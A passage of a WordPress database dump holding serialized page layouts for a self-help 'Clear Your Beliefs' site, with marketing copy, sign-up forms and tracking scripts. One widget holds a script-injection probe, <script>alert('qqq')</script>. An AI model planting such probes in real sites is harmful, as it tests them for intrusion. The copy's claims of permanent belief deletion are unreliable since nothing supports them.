here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul style="margin-left: 25px;"><li><em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:509:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p><hr id="lines" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</i></center>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:6:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}}}'),
(1120, 1605, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:687:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:611:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 87px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1386:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program will help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1109, 1596, 'panels_data', 'a:3:{s:7:"widgets";a:10:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:554:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:5:"title";s:6:"script";s:4:"text";s:29:"<script>alert(''qqq'')</script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:863:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:702:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, \nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1386:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program will help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:9;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1389, 1830, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1466:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2142:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1217:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong><u>Clear Your Limiting</u> and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p>\n\n<form class="infusion-form rd-form-1" style="position: relative; bottom: -50px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script 